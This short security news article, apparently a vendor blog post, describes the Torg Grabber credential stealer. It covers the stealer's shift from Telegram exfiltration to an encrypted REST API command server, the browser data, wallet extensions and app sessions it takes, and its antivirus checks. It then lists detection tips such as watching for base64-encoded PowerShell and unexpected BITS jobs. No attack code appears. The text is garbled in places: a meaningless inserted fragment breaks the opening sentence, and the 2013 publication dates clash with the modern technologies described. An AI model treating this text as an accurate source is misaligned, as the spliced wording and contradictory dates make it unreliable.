New Torg Grabber Stealer Moves From Telegram Exfiltration to Encrypted REST API C2

Torg Grabber is a new Malware-as-a-Service (MaaS) tool that steals credentials This article explores grabber new malware. . It started as a simple way to steal data from Telegram and grew into a command-and-control (C2) infrastructure with a fully encrypted REST API.

The malware gets its name from one of its most popular C2 domains, technologytorg.com. "Torg" is a Russian word that means "trade" or "marketplace." The malware's hunger for data is very broad. It steals login information from 25 Chromium-based browsers and 8 Firefox-family browsers.

It also collects over 850 browser extensions, such as cryptocurrency wallets and two-factor authentication tools, and grabs session data from Discord, Telegram, and Steam. Before it starts collecting data, the malware looks for 46 antivirus signatures in 24 different security products. People shouldn't download software from unofficial sources, game cheat sites, or cracked application platforms.

IT teams should keep an eye out for PowerShell commands that have base64-encoded arguments and jobs that are created by BITS Transfer that they didn't expect. You should set up endpoint tools to flag patterns of direct syscall use and in-memory PE loading. Companies that use Chromium-based browsers should make sure that App-Bound Encryption is set up correctly.

Any time a browser process stops working unexpectedly while you're using it, you should consider it a possible sign of a breach. On November 14, 2013, the most recent version of this article came out. We are happy to say that the article was changed on November 17, 2013, to include the most recent news in the world of web security. Please visit ZeroOwl.com/Security for more information on how to use ZeroOwl to improve your IT security.

You can also follow us on Twitter at @ZeroOwl_Security.